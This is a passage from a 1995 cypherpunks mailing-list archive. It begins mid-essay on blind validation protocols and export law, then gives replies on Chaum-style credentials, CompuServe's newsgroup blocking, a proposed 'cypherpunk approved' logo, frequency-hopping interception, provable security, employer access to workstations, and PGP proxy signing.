going back for tickets over and over again.


III  Kids and Liquor Stores

Imagine a group of teenagers who want to buy some booze.  Let's
consider two attacks they can mount on a liquor store:  they can
go in and try to trick the clerk into selling to them, or they
can hang around in the parking lot and try to convince an adult
to buy for them.

The liquor store wants to keep its license, so it tries hard to
defend against the first attack.  But there's nothing they can do
about the second attack, and what's more, they really don't have
to worry about it.  If they give booze to minors, they can lose
their license or possibly even face criminal charges.  But if
some other adult gives booze to the minors, he's responsible. 
It's not the liquor store's problem.

If the kids get their booze from the clerk or another customer,
the end result is the same:  the kids are able to get drunk.  But
from the store's point of view, there's a big difference, the
difference between losing their license and keeping it.

This is very different from the attitudes of the participants in
most crypto protocols.  If I use a protocol to exchange secure
email, I don't want anyone except the recipient to read it.  It's
not much comfort for me to be able to say, "It's not my fault,"
if the mail becomes public.

But the liquor store has to be able to live with the possibility
that a kid will get ahold of some booze from their shelves.  If
that's absolutely unacceptable to them, the only thing they can
do is close their doors or make patrons drink up in front of the
clerk, because they can't prevent a customer from giving a bottle
to a minor.  The main interest of the liquor store is to avoid
blame for underage drinking, not to make absolutely sure that
kids can't drink.



IV   Alice, Bob, and Sam.

Let's assume that Bob is running an FTP archive with crypto
software, and Alice wants to download it.  Alice wants to remain
anonymous.  Let's assume that a blind validation scheme, where
Alice proves that she's a US citizen while remaining anonymous,
is acceptable to both of them.

If a blind validation scheme is acceptable, why isn't no
validation at all?  Obviously Alice ought to be satisfied with no
validation.  She wants the file, and she wants to remain
anonymous.  If Bob doesn't use any validation, Alice is still
happy.

But what about Bob?  Bob's not an idiot.  He knows that if he
distributes crypto software on the net, someone's going to send a
copy to Europe, and if he uses blind validation he won't be able
to find out who did it.  Consequently, if the software's
appearance in Europe is totally unacceptable to Bob, he won't
distribute it with blind validation.

If Bob can live with the software appearing in Europe, why does
he want to use blind validation to check for citizenship?  The
answer, obviously, is that Sam (as in Uncle, the government) has
told Bob he'll be imprisoned if he exports the software.  The
blind validation scheme will let Bob distribute the software
anonymously (which is what he wants to do) and prove to Sam that
he's followed the letter of the law.

In general, it doesn't seem that there are many situations that
only involve Alice and Bob where blind validation makes sense.
If Bob is willing to accept the increased risk of transferability
that comes with blind validation, he'll probably be willing to
accept no validation at all.  Blind validation becomes useful
primarily when you add Sam to the mix.

This isn't an absolute truism of course.

Let's think about a library card catalog at a University.

I remember a conversation I once had with an INS investigator, in
which he told me that he sometimes asked for a list of all the
books his targets had taken from the public library.  You can
learn a lot about someone from what they read, or even from their
card catalog searches.

I know that some universities restrict access to their card
catalogs to students, faculty, and staff.  Why?  Because they
don't want to shoulder the cost of providing a research tool to
the entire net.  They're not trying to protect the information --
they're trying to reduce load on their library computer.

Perhaps a University might recognize that there there's some
value in using a blind authentication system to grant access to
the catalog.  It could protect the privacy of the people using
the catalog, and still do a reasonably good job of keeping out
people who shouldn't be involved.

The role of Sam in this discussion might be one of the reasons
that blind validations haven't generated much interest on the net
in general or on the cypherpunk list specifically.  If blind
validation is privarily useful for cooperating with laws we don't
agree with, then it's not unreasonable to look at it as a
technology of collaboration.  A viable blind validation scheme
might make censorship more attractive.


V    A protocol

Let's assume that Alice knows that Bob and Trent are who they
claim to be, and that she can talk to Bob anonymously, perhaps
through a chain of remailers or a dc net.  This protocol isn't
intended to protect Bob's privacy, only Alice's.

We also assume that there's some sort of system in place for non-
blind validations.

1.   Alice initiates a transaction with Bob.  (Perhaps by asking
     him for a file.)

2.   Bob generates a random number and sends it back to Alice.

3.   Alice blinds Bob's number and sends it to Trent, along with
     proof of her validatability.

4.   Trent checks Alice's proof, signs the blinded number, and
     then returns it to Alice.

5.   Alice unblinds Bob's number, then sends it to Bob.

6.   Bob checks Trent's signature and makes sure that the number
     he recieved matches the one he sent out.  Then Bob processes
     Alice's transaction.

If Bob always follows this protocol, he can prove to Sam that
he's followed the law.  Alice remains anonymous.  Alice can still
transfer the file, but she has to give it away herself:  she
can't give away the ability to get it directly from Bob without
giving away the ability to prove Aliceness to Trent.  This means
that she'd have to accept all the consequences of giving away
non-blind validatability.

The main problems that I can see with this protocol are:

1.   It's vulernable to traffic analysis.
2.   Sam has to trust Trent, which he may be unwilling to do.
3.   You can infer stuff about Alice from the kinds of requests
     she makes of Trent.  Someone who always asks Trent for proof
     that he's not a felon might tag himself as a person who buys
     a lot of guns or ammunition, for example.

I'd like to put Trent out of a job, but it's hard to imagine a
Trentless system without Chaum's observer chips.  I've read Hal's
criticisms of observer chips, and what he says makes sense to me.

But observer chips could be more appropriate in a blind
validation situation than they are with ecash.  Ecash security
has to be bullet proof, but if we can live with transferability
in a blind validation system we've already given up on such
rigorous security.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Fri, 29 Dec 1995 14:03:55 +0800
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: cool cpunk project proposal: "cpunk approved" logo
Message-ID: <199512282150.NAA10375@urchin.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


>now, I don't know if people here realize how much great potential this
>idea has. the media just LOVES to quote these kinds of judgements when
>it's a slow news day (witness Blackwell's "worst dressed" list or
>"best haircuts" or whatever else).

Well...nothing personal, but I'd rather cut my n*ts off than be the
blackwell of the information industry... >:-)

And not to poo-poo a nifty idea, but ultimately, I think that any c'punk
cooperative effort like that is doomed to failure. Sure, people can manage
to get together every month or so for a cypherpunk meeting (well, *I* can't,
but I'm even more disorganized than most), but beyond that, things like
official c'punk press releases, and official c'punk FAQs, and official
c'punk seals of approval are just NOT going to happen and still be called
Officially Cypherpunk. It's tough to have an "official" anything for a group
that's not REALLY a group--just the name of a mailing list. 

Now, this doesn't stop Tim from creating his Cyphernomicon, and it doesn't
stop other people on this list from issuing their own press releases. Nor
should it stop you (and other interested parties) from issuing your seal of
approval to worthy products. I just don't think it'll work to call it the
Official Cypherpunk S-O-A.

Besides, the idea of having an official seal-of-approval sticker sounds like
we're only one step away from having Cypherpunk action figures. ("New Eric
Hughes figure with crushing logic grip! Detweiler with whirling Tentacles of
Doom (tm)!")

Uh, I guess I should have put "NOISE" in the subject line...


Corey Bridges
Security Documentation
Netscape Communications Corporation
home.netscape.com/people/corey
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Dec 1995 12:59:15 +0800
To: cypherpunks@toad.com
Subject: Compuserve is Not "Censoring": Look to Governments for the Cause
Message-ID: <ad083eea080210049a53@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:52 PM 12/28/95, Cees de Groot wrote, speaking of Compuserve's recent
dropping of many newsgroups in response to demands by German prosecutors:

>I won't start to comment on the style of this message. The term "Suitspeak"
>comes to mind.

Perhaps it is "Suitspeak," but it is not "censorship."

Or, more precisely, it is fear that government laws will be used to
sanction the service.  Thus, it is the government of Germany in this case
which is "censoring." ("Censor" and "censorship" are notoriously overloaded
terms, of course.)

Likewise, the Telecom/Exon Bill which we are so opposed to would just make
the U.S. another player in this arena, joining Germany, Iraq, Syria,
Singapore, and other regimes in attempting to regulate what people access
on the Net. The U.S. would most like demand that a foreign-based service
operating in the U.S. comply with U.S. laws. The problem lies with the laws
themselves, as there is essentially no solution which will accommodate all
of the various conflicting standards and mores of the world's nations and
tribes while still having a Net such as we know it today. This is why I
favor "technological anarchy": have systems which allow people to read and
write what they want to read and write, not what church elders or
government officials have deemed to be approprate or wholesome.

(Note: There are ongoing debates about whether laws against obscenity,
pornography, insulting speech, and on and on, violate free speech
provisions in the U.S. Constitution. I won't get into this here. However,
the laws of Germany, Iraq, North Korea, Singapore, France, Syria,......,
Germany, Japan, Italy, and Zaire are definitely not those of the U.S. Thus,
any _global_ service, such as Compuserve, may soon be forced to remove 70%
or more of all Usenet newsgroups, and to restrict Web page access. After
all, providing access to "alt.binaries.pictures.muslim.women.nude" is
punishable by death by stoning in at least 30 countries. And providing
access to Christian recruiting groups, and most Jewish groups, is
definitely not allowed in the Kingdom of Saudi Arabia--better remove all
those groups.)

More than just Compuserve and AOL--which has a list of words it does not
like to see used--I expect the various attempts to crack down on
un-Christian, un-Muslim, un-chastity, etc. words and images to spread.
Singapore will have its list of things it doesn't want its "children" (=
all citizen-units) to see, Nigeria will have its list, and so on.

Germany's longstanding moves to limit images and words it considers
inappropriate and offensive are likely to force many Usenet newsgroups out
of Germany. Law enforcement there is concentrating on Compuserve, and is
trying to get U.S. officials to crack down on neo-Nazi Web sites in the
U.S.

The shape of things to come.

Technology to bypass these new laws, not even more laws, is the key.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 28 Dec 1995 22:40:35 +0800
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: proposal for new cyber abbreviation
In-Reply-To: <199512271947.LAA22943@netcom17.netcom.com>
Message-ID: <199512280403.PAA10201@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello,

"Vladimir Z. Nuri" <vznuri@netcom.com> wrote:
 
> yes, cyberspace just doesn't have enough acronyms like AFAIK and IANAL etc.
> ad nauseam. (I have reason to believe that PTB, or "powers that be" was
...
> SHTBD!!!!
> 
> as in, Something Has To Be Done.
...

Proposed extension:

SHTBD/<agent>

eg:

There's a paedophile on the Internet! SHTBD/PTB!

PTB're trying to regulate cyberspace! SHTBD/EFF!

PTB're pushing GAK! SHTBD/C'punks!

And so on. After all, all sides can cry "SHTBD", can't they?


(Home users may prefer the alternate syntax SHTBD\<agent>, ie
SHTBD\PTB, SHTBD\EFF, SHTBD\C_PUNKS etc :-)

...
> used either seriously or satirically (probably mostly satirically by
> everyone here).
> 
> example:
...
> "I was not implying that SHTBD, merely that we are moving into a brave
> new world in cyberspace".

How about something like:
"I was not implying that SHTBD/PTB to stop it, but that SHTBD/us to
support it/deploy it/get ready for it."

...
> notice that SHTBD is the antithesis of cypherpunk philosophy in that
> it tends to imply
> 
> 1. government intervention

Hence the addition of the <agent> field...

> 2. coercive force
> 3. censorship
...

Yet one of your examples implied the opposite - sorry, I nuked it, but
it was about the media picking bogeymen.

...
> hence by using this term and popularizing it, we promote our own agenda
> of "cryptoanarchy".
...

Fortunately for the anarchists, perhaps, an authoritarian government
is isomorphic to anarchy.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMOIXESxV6mvvBgf5AQEOBQQA7ShSGoioMAb6CF5ot0sxu57hvBwMDJDw
MmkBLnPXvoYaL8dOEc5uYhdtLa8hkPapXT3NEUywI1SDDx7QUc4YgbzfQCQNAgz0
HYlfUlL1SA1N7JQIiyHEBN+jWaldzEGGflLxJPy83vm4N1pyo0gluzzi2hMJigcD
FgU3G8LjcoE=
=aBT9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 29 Dec 1995 15:01:31 +0800
To: cypherpunks@toad.com
Subject: Re: [reply to anonymous] Re: rsaref
Message-ID: <199512290035.QAA09284@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:06 AM 12/29/95 +0100, Alex de Joode <usura@utopia.hacktic.nl> wrote:
>to whom it may concern:
>
>rsaref20 is available on ftp.hacktic.nl since may 1995 in
>
> /pub/replay/pub/crypto/LIBS/rsaref20.zip

If the RSA folks want to get picky, this may be violating their
copyright, which is enforceable in Europe (unlike their patents.)
There's also an RSAEURO clone of RSAREF which is available on
ftp.ox.ac.uk/pub/crypto, and presumably at many other fine sites.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "The price of liberty is eternal vigilance" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vaughan Pratt <pratt@cs.Stanford.EDU>
Date: Fri, 29 Dec 1995 17:58:18 +0800
To: cypherpunks@toad.com
Subject: Re: Fwd: Re: Fwd: Re: FH radios [Dave Emery] [Vaughan Pratt]
In-Reply-To: <9512270551.AA23874@pig.die.com>
Message-ID: <199512290049.QAA28702@Coraki.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



	That is not what Mr Shannon says,  Shannon's law relates date
	rate, bandwidth and signal to noise ratio - the "channel
	capacity" of 26 mhz of spectrum is determined by the signal to
	noise ratio in the 26 mhz channel and ranges from much less
	than 26 mbs to several times that rate depending on the signal
	to noise ratio (and of course how clever the modulation
	technology is at exploiting it).  Witness a 28.8 kb modem which
	stuffs 28.8 kb into less than 3.2 khz given about 32 db gross
	SNR.

Oops, mega*samples*, not megabits, how embarassing.  I agree with your
numbers, I was low by an order of magnitude or so on the quantity of
data one would need to examine to reconstruct the message.

But now that I think about what 902-928 MHz looks like in practice, I
think I underestimated how hard things could get.  If you're just
trying to track a frequency-hopping signal where the rest of the power
in the band is some mix of Gaussian noise and non-hopping signals, the
carrier should be clearly visible as a spike hopping around in the
band.  As soon as you have two or more frequency-hopping signals
however, keeping track of which carrier is which as they hop around
looks *much* harder.  If they hop at discernibly different times then
you can correlate a carrier that disappeared with the one that appeared
elsewhere at the same time.  This easily described and implemented
approach breaks down when two or more signals hop at the same time.
Here you might try to associate some sort of signature with each signal
to allow you to pair up the new carriers with the old, but you'd have
to know more about the situation to say what signatures would be good.

Similarly a single spread-spectrum signal should be easy to pick out,
but multiple such sounds like an even bigger headache than multiple
hoppers.

	But even the security of mathematical crypto is mostly unproven
	as of yet - we merely think things are difficult to compute
	because we don't know an easy way to do it, not because there
	is a clear proof that is true.

Yes, this is a very important point (but presumably an obvious one to
cypherpunks, maybe I should subscribe).  Worse, even if we *could*
prove a certain protocol secure, the proof will typically apply only to
the protocol and not to any particular message transmitted using that
protocol.  There is a very big difference between proving the absence
of a fast decryption algorithm for a given encryption scheme and
proving that every message so encrypted is secure.  One might call this
distinction existential security vs. universal security.  A universally
T-secure channel is one for which every message is secure from all
T-bounded attacks (algorithms taking time at most T expressed as a
function T(n) of the length n of the message).  An existentially
T-secure channel is one such that for every T-bounded attack there
exists an infinite set of messages all of which are secure from that
attack, though not necessarily the same messages as you vary the
attack.

(As a practical matter it would be more useful to replace the function
T by a fixed long duration such as a googol seconds, provided this
could be achieved with messages of size at most say a kilobyte, a point
of view advocated by e.g. Leonid Levin.  This requires taking the
state-symbol product of the computational model into account when
measuring computational complexity since constant factors can no longer
be neglected; here Kolmogorow complexity is a particularly natural
setting.  This still only addresses algorithmic attacks; for security
against hardware attacks one should also appeal to limits set by physical
constants like c and h-bar.)

The danger is that someone will eventually demonstrate existential
security for a protocol, the proof will as usual be trumpeted in the
New York Times, and it will be interpreted by many as proving universal
security.

An intermediate notion is that of a uniformly existentially secure
channel: there exist some messages secure from all attacks.  But if
those messages can be efficiently identified then such a channel can be
converted to a universally secure channel simply by only transmitting
secure messages.  Modulo the identification problem, this shows that it
is no easier to come up with a uniformly existentially secure protocol
than a universally secure one.

With a few exceptions, arising in e.g. quantum cryptography, we don't
even have existentially secure protocols yet, let alone universally
secure ones.

Vaughan Pratt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 29 Dec 1995 13:21:45 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Employer Probing Precedents?
In-Reply-To: <Pine.SUN.3.91.951228091552.4338d-100000@goya>
Message-ID: <9512282259.AA12970@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
 > The notion that, simply because you're wearing a uniform owned by your
 > employer, you're subject to physical search at the employer's
 > discretion is laughable.  The difference between this and searching the
 > computer on one's desk differ only in degree, IMO.

Another vaguely-related concept is that of tenants' rights to a degree
of security in rental property.

My employer owns the workstation in front of me, but in exchange for
supplying them with software and ideas (when I'm not busy sending
e-mail to mailing lists ;-) they've "given" it to me to use in that
pursuit.  They could of course insist that I pay for it, like the old
company store model that railroad workers dealt with.  In a sense I
do pay for it, under the idea that the company would be able to pay me
more if not for the expense of the tools I need for the job.

Though the ownership==control equation works sometimes, and is
appealing to reason, I don't think things are always so simple.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Fri, 29 Dec 1995 10:41:50 +0800
To: cypherpunks@toad.com
Subject: Re: Proxy/Representation?
In-Reply-To: <199512281517.JAA13397@cdale1.midwest.net>
Message-ID: <30e2ce46.37070124@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David E. Smith wrote:

> The question is: how do the current software packages handle representatives
> and proxies for a given is-a-person?  Using PGP as an example, I can't sign
> a message with Helen's key.  And a message signed with my key won't hold
> as much weight because "Dave" is not "Helen."  And if every message I send
> on behalf of Helen has to be followed up by a message from Helen stating
> "yes, Dave may act on my behalf for this instance" then much of the point
> of the proxy process is lost.  (i.e. the reduction of Helen's workload etc.)

I would think a power-of-attorney, signed by Helen, would do the
trick.  This would normally be valid for some pre-defined period, for
a pre-defined set of transactions, and would not have to be generated
anew each time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Fri, 29 Dec 1995 17:57:27 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Employer Probing Precedents?
In-Reply-To: <9512282259.AA12970@alpha>
Message-ID: <199512290107.RAA27776@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
> Scott Brickner writes:
>  > The notion that, simply because you're wearing a uniform owned by your
>  > employer, you're subject to physical search at the employer's
>  > discretion is laughable.  The difference between this and searching the
>  > computer on one's desk differ only in degree, IMO.
> 
> Another vaguely-related concept is that of tenants' rights to a degree
> of security in rental property.

Wrong model.  You don't pay rent to your employer for your computer.


Your deskside workstation is just like your desk
that it sits beside when it comes to employer/employee rights.
While a prudent employer won't go through your desk unless it's
required, they do have the right to do so.

Many companies have stated policies as to when they can go through
your desk;  at places like IBM it is very restrictive as to when
managers can go through your desk.  This is merely smart business- giving
people trust is the best way to make them responsible.

All companies should also have written policies that state what
parts of employee's computers/hard drives/home directories/email
etc. is considered private, and under what circimstances management
is allowed to look through those areas.  I managed to sneak a policy
like this into the computer security policy I wrote for a previous employer.
Again, the policy should strictly limit what snooping through employee's
files the company will do.  Any company that goes through it's employee's
files with less than sufficient justification is going to generate a lot
of negative reputation, and fast.

Does this allow for employees keeping encrypted material on their
company computer?  I don't think so, or rather I think that it's in
the company's rights to ask for the encryption keys under certain
circimstances- employee leaving company, employee suing company, etc.
If you've kept something damaging on your employers machine, you better
delete it before the situation gets so bad that they'll be going through
your files.


If you want to keep something secret, put it on your own machine.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 29 Dec 1995 15:35:59 +0800
To: Corey Bridges <corey@netscape.com>
Subject: Re: cool cpunk project proposal: "cpunk approved" logo
In-Reply-To: <199512282150.NAA10375@urchin.netscape.com>
Message-ID: <199512290136.RAA05099@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>And not to poo-poo a nifty idea, but ultimately, I think that any c'punk
>cooperative effort like that is doomed to failure. Sure, people can manage
>to get together every month or so for a cypherpunk meeting (well, *I* can't,
>but I'm even more disorganized than most), but beyond that, things like
>official c'punk press releases, and official c'punk FAQs, and official
>c'punk seals of approval are just NOT going to happen and still be called
>Officially Cypherpunk. It's tough to have an "official" anything for a group
>that's not REALLY a group--just the name of a mailing list. 

you totally misunderstand my message. this is NOT an "official" project,
it is NOT a cooperative project. I am proposing that INDIVIDUALS undertake
the project under the cypherpunk name. no one has a right to complain
after all, when there is no *official* cypherpunk standard. really, I do
LOVE anarchy.

>Now, this doesn't stop Tim from creating his Cyphernomicon, and it doesn't
>stop other people on this list from issuing their own press releases. Nor
>should it stop you (and other interested parties) from issuing your seal of
>approval to worthy products. I just don't think it'll work to call it the
>Official Cypherpunk S-O-A.

I did not call it that. and in fact I of all people understand cypherpunk
psychology quite well, thank you very much. <g>

>
>Besides, the idea of having an official seal-of-approval sticker sounds like
>we're only one step away from having Cypherpunk action figures. ("New Eric
>Hughes figure with crushing logic grip! Detweiler with whirling Tentacles of
>Doom (tm)!")

not a bad idea imho.  <g>

but really, someone came up with a Big Brother Inside sticker without a
lot of whining about "officialness". all I am proposing is exactly the
same thing, except that it would have the word "cypherpunk" on it. what's
the difference? absolutely none. no one has any right to complain how
the cypherpunk name is used if there is no "official" cypherpunk
management.

but notice I was excessively careful never to imply there was anything
OFFICIAL the project. there is to be no collaboration or coordination
except that agreed to by participants. what could be simpler???

it's really ridiculous how much the word OFFICIAL is considered 
pornographic on this mailing list. I didn't use that word and went to
great lengths not to (and do so in ALL my mail to this list knowing the
hypersensitivity of its participants).

what I do object to is that because there is no OFFICIAL cypherpunk
standard that individuals cannot create one that they CALL official.
there is NOTHING stopping anyone from claiming they are running the
OFFICIAL cpunk FAQ or whatever as long as there is no OFFICIAL
cpunk management. what, is someone gonna sue? heh. no one has a 
right to complain!! why do I have to reiterate this obvious point?

the sword cuts both ways. or, that communication path is full duplex, 
so to speak.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 29 Dec 1995 15:37:40 +0800
To: cypherpunks@toad.com
Subject: Re:  blind validation
Message-ID: <199512290144.RAA28654@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Those are very interesting thoughts Alex Strasheim posted about
blind validations.  The issue of people handing out copies of their
validations ("credentials" is the term Chaum uses) can be significant.

Chaum's way around it was basically to have some mechanism to give
each person a unique number of some special form.  There doesn't have
to be any agency who knows what number each person has (in fact, there
isn't, in his scheme), but there is a mechanism to assure that one
person does not get two numbers.  This is sometimes loosely referred to
as an "is-a-person" credential (although in this specific context it is
not actually a credential, just an identifier).

One way to achieve the goal would be to make each person give a
thumbprint, or some other biometric identification, in exchange for
giving them the is-a-person credential.  Another way would be to use
conventional ID, making sure their credential is blinded.

Then, the blind validations are mathematically structured to be linked to
the identity number.  Only someone who has a specific identity number can
show a specific blind validation.

The idea here is that this addresses the copying-validation problem
because a person would not only have to give away the specific
validation, but also his identity number.  This would in effect let the
other person masquerade as the first, and any bad things he did would
come back to hurt the person who gave away the data.  You can't just walk
away as in a totally uncontrolled blind signature system because of the
linked nature of the credentials, and because you only get one identity
number.

So the result in effect is to make it difficult to give away just a
validation, without also giving away the ability to act as you.  Here
is an idea about another way to achieve the same thing, closer to
Alex's example:  Alice gets a blind validation as Alex describes based
on a simple blind signature.  (Alice hands a blinded number to Bob, he
signs it, Alice unblinds it, and uses the resulting signed number as
the validation to, say, access Bob's files.)  We add that Alice puts,
say, $100 into "escrow", encrypting it with the secret number and
putting it on some public server.  She proves to Bob that she has done
this using cut and choose.

Now if Alice gives away her secret number, anyone using it will be able
to access Bob's files, but they can also get the $100.  So now it costs
something for Alice to give away her secret.

(There are some major problems with this idea, the worst being that Alice
can extract and spend the $100 right after proving to Bob that she is
doing what she said, and before publishing her number.  Maybe someone
could think of some fixes.)

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cees de Groot" <C.deGroot@inter.nl.net>
Date: Fri, 29 Dec 1995 09:44:38 +0800
To: jpp@software.net (John Pettitt)
Subject: Re: FYI - telecom bill or not there are still censors
In-Reply-To: <2.2.32.19951227172007.0070f34c@mail.software.net>
Message-ID: <199512281652.RAA05245@bofh.cdg.openlink.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 
> According to reports popping up in other places around the Compuserve 
> Information Service it appears that they have taken a stance of Internet 
> censor and are now blocking access to certain Usenet newsgroups.  This 
> move took place just before the Christmas holiday and remains unannounced 
> to the membership/subscriber base.  
> 
I got this response so fast, that I cannot do anything else but assume that
they got an automated reply thingy on such requests. For any other simple
question, CI$ needs something like a week to reply...

:To: <C.deGroot@inter.nl.net>
:Subject: Usenet Newsgroups
:
:Re: USENET Newsgroups
:
:
:Thank you for using CompuServe Feedback!  This is in reference
:to your message concerning the disappearance of certain newsgroups
:on CompuServe.
:
:Access to these certain newsgroups have been suspended indefinitely.
:CompuServe has been notified that these areas may be in
:violation of applicable laws or regulations. This matter is
:under further review.
:
:Please let us know if you have any further questions.  Thank you for
:using CompuServe Feedback!
:
:Charlotte Harris
:

I won't start to comment on the style of this message. The term "Suitspeak"
comes to mind.

-- 
Cees de Groot, OpenLink Software		     <C.deGroot@inter.NL.net>
262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers]
 -- Any opinions expressed above might be mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Fri, 29 Dec 1995 17:54:23 +0800
To: lull@acm.org (John Lull)
Subject: Re: Proxy/Representation?
Message-ID: <199512290017.SAA00616@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:07 PM 12/28/95 GMT, lull@acm.org wrote:

>> The question is: how do the current software packages handle representatives
>> and proxies for a given is-a-person?  Using PGP as an example, I can't sign
>> a message with Helen's key.  And a message signed with my key won't hold
>> as much weight because "Dave" is not "Helen."  And if every message I send
>> on behalf of Helen has to be followed up by a message from Helen stating
>> "yes, Dave may act on my behalf for this instance" then much of the point
>> of the proxy process is lost.  (i.e. the reduction of Helen's workload etc.)
>I would think a power-of-attorney, signed by Helen, would do the
>trick.  This would normally be valid for some pre-defined period, for
>a pre-defined set of transactions, and would not have to be generated
>anew each time.
That's basically the situation in the wonderful world of paper.  What
I'm interested in is how to handle the power-of-attorney case in the
world of bits.  (I've been using PGP as my example, but I'm certainly
open to software that handles it better; suggestions?)  Even if Helen
signs my PGP key, that doesn't do anything other than connect us in the
almighty Web of Trust (for whatever that's really worth).

dave

----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Fri, 29 Dec 1995 14:44:33 +0800
To: perry@piermont.com
Subject: Re: Proxy/Representation?
Message-ID: <199512290017.SAA00619@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:46 AM 12/28/95 -0500, perry@piermont.com wrote:

>"David E. Smith" writes:
>> The question is: how do the current software packages handle representatives
>> and proxies for a given is-a-person?  Using PGP as an example, I can't sign
>> a message with Helen's key.
>Nor should you be able to, actually.
And I can't :)

>The right way to do this in the digital world, IMHO, is to have a
>standard for "Power of Attorney" documents, and for the entity
>receiving something signed in your key that should be signed in
>another person's key to also see the digitally signed power of
>attorney document. Then the entity can check the signature on the
>power of attorney was in Helen's key, and that the signed key in that
>document was the key that signed the document signed by the "attorney".
That's more of what I was looking for.  I suppose that (I'm still using
PGP as my example) there could be a shared PGP key, signed by Helen and
myself, where only the two of us know the passphrase, with a keyid of
"David Smith <dsmith@midwest.net> on behalf of Helen Jones <helen@devnull.org>"
or something similar.  The obvious problem is that in sharing the pass
phrase the security is weakened.  (Paranoid threat model: at some point
we have to decide on the pass phrase, and we are videotaped/bugged/spied
upon while this takes place.)

dave

----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 29 Dec 1995 14:55:23 +0800
To: "David E. Smith" <dsmith@midwest.net>
Subject: Re: Proxy/Representation?
In-Reply-To: <199512290017.SAA00619@cdale1.midwest.net>
Message-ID: <199512290024.TAA10333@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David E. Smith" writes:
> >The right way to do this in the digital world, IMHO, is to have a
> >standard for "Power of Attorney" documents, and for the entity
> >receiving something signed in your key that should be signed in
> >another person's key to also see the digitally signed power of
> >attorney document. Then the entity can check the signature on the
> >power of attorney was in Helen's key, and that the signed key in that
> >document was the key that signed the document signed by the "attorney".

